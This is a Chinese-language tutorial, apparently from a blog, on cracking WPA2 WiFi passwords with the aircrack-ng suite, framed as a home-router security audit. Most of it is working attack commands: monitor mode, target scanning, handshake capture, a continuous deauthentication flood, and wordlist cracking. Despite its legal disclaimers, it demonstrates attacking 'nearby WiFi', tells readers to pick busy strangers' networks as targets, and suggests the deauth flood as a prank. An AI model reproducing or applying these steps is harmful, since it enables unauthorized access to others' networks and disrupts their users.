无线密码破解工具 -(附下载)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
审核家庭无线路由器安全性的教程
欢迎大家来到魔鬼小Kevin的教程!作为一个可爱帅气机智的不正经号主,我将在这里为大家介绍如何审核家庭无线路由器的安全性。首先,我要强调破解别人的无线路由器密码是违法行为,请大家遵守法律规定。
在这个教程中,我们将使用一个名为Aircrack-ng的安全软件,它与802.11标准的无线网络分析有关。它的主要功能包括网络侦测、数据包嗅探以及WEP和WPA/WPA2-PSK的破解。
你需要准备以下工具和设备:
- 一台装有Linux系统(推荐Kali)的计算机或虚拟机
- aircrack-ng套件
- 一张支持数据包注入和网络监听的无线网卡
接下来,我们将按照以下步骤进行WiFi密码破解:
- 使用aircrack-ng工具将无线网卡切换到监听模式。
- 确定目标WiFi的信息,如MAC地址、信道和连接数等。
- 模拟无线信号,并抓取密码信息。
- 选择目标用户,发动攻击。
- 获取加密的无线信息,并通过密码字典进行破解。
以上就是破解WiFi密码的步骤。接下来,我将演示如何破解附近的WiFi密码。
WiFi密码破解步骤演示:
- 使用ifconfig命令查询无线网卡名称(一般是wlan0,我的是wlp3s0)。
[caifenglin@caifenglin-super ~]$ ifconfig
enp0s31f6: flags=4099 mtu 1500
ether 54:e1:ad:4c:be:a5 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
device interrupt 16 memory 0xe1300000-e1320000
lo: flags=73 mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10
loop txqueuelen 1000 (Local Loopback)
RX packets 87972 bytes 202035327 (192.6 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 87972 bytes 202035327 (192.6 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlp3s0: flags=4163 mtu 1500
inet 192.168.43.115 netmask 255.255.255.0 broadcast 192.168.43.255
inet6 fe80::784d:9497:1275:4b89 prefixlen 64 scopeid 0x20
ether cc:2f:71:9f:dd:78 txqueuelen 1000 (Ethernet)
RX packets 472508 bytes 567343526 (541.0 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 245806 bytes 34910387 (33.2 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
- 开启无线网卡的监听模式,使用命令:
sudo airmon-ng start wlp3s0
。请注意,网卡名称可能会发生改变(增加了mon),此时网卡处于监听模式。注意:此时电脑无法连接WiFi,如果发现电脑设置中无线连接消失了,是正常现象。破解完WiFi密码后,关闭监听模式后无线连接将重新出现。
- 扫描目标WiFi,使用命令:
sudo airodump-ng wlp3s0mon
。如果当前WiFi有数据流量,说明有人正在使用,你可以将其作为攻击目标。观察后选择一个你想破解或攻击的WiFi,前提是它有数据显示(Data列),选择一个有数据(数据越大越好)的WiFi后,按下Ctrl+C停止扫描,并复制你选择的MAC地址。
现在,我们需要确认一些信息,包括目标AP(即WiFi)的MAC地址、信道和加密方式:
- BSSID:目标AP的MAC地址(WiFi路由器的MAC地址),如图中蓝色框所示。
- CH(信道):1,如图中黄色框所示。
- 加密方式:WPA2。
这些信息对我们来说足够了。
- 模拟WiFi信号并抓包,使用命令:
sudo airodump-ng –ivs -c 1 –bssid 74:F8:DB:62:1C:1D -w /work/wifi/wifipackage wlp3s0mon
。其中,–ivs
指定生成文件的格式为ivs,-w
指定文件名称为wifipackage,–bssid
指定目标AP的MAC地址,-c
指定模拟的WiFi信道(这里是1)。
- 进行洪水攻击,请保持上面的窗口不要关闭,并在新窗口输入命令:
sudo aireplay-ng -0 0 -a 74:F8:DB:62:1C:1D wlp3s0mon
。其中,0
表示不断攻击,这个命令也可以理解为让当前路由下的所有连接断开。如果你想搞恶作剧,可以试试这个命令。
请注意黄色框的位置,如果在发送攻击数据包后出现了黄色框的信息,说明密码信息抓取成功。此时可以结束WiFi模拟,按下Ctrl+C,然后查看我们指定的目录,会发现多了一个wifipackage-01.ivs文件,我们想要的密码就在这个文件中,但是它是加密的,所以我们还需要通过密码字典来破解密码。
注:
如果一直没有出现黄色框,可以尝试切换另一个WiFi进行攻击,尽量选择Data值较高的WiFi,如果Data为0,破解成功的可能性很低。
有时可能会出现错误,请多执行几次。如果您知道解决方法,请留言告诉我,谢谢。
指定密码本来破解文件,使用命令:
sudo aircrack-ng -w /work/wifi/password.txt /work/wifi/wifipackage.ivs
。其中,/work/wifi/password.txt
是密码本的路径,/work/wifi/wifipackage.ivs
是抓取的包的路径。
请注意:如果WiFi密码非常复杂,包括数字、字母和特殊字符等,可能需要很长时间才能破解,甚至可能无法破解。这与密码字典的内容也有关系。但一般来说,大部分WiFi密码都可以破解,除非密码包含特殊字符。纯数字的密码只需要几秒钟就能破解,带有字母和数字的密码通常也能破解,只是需要花费一些时间。
到这里,密码破解就完成了!请大家谨记,本教程是为了审核家庭无线路由器的安全性,破解他人的无线路由器密码是违法行为。我们应该放弃使用WEP加密,真正关注WPA2的安全性,并禁用WPS功能。
如果你对这个教程感兴趣,请长按下方二维码。